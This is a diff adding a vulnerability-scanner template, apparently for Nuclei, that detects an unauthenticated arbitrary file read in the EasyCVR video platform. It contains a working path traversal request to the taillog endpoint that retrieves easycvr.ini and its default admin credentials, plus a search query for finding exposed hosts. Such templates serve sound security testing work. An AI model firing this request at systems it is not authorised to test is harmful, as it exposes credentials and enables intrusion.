diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
new file mode 100644
index 00000000000..934b55491d5
--- /dev/null
+++ b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
@@ -0,0 +1,46 @@
+id: easycvr-arbitrary-file-read
+
+info:
+  name: EasyCVR Video Management - Arbitrary File Read
+  author: s4e-io
+  severity: high
+  description: |
+    The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.
+  remediation: |
+    Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files.
+  reference:
+    - https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: icon_hash="458134656"
+  tags: easycvr,unauth,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "<title>EasyCVR")'
+          - "status_code == 200"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "default_admin_user", "default_admin_password")'
+          - 'contains(content_type, "text/plain")'
+          - "status_code == 200"
+        condition: and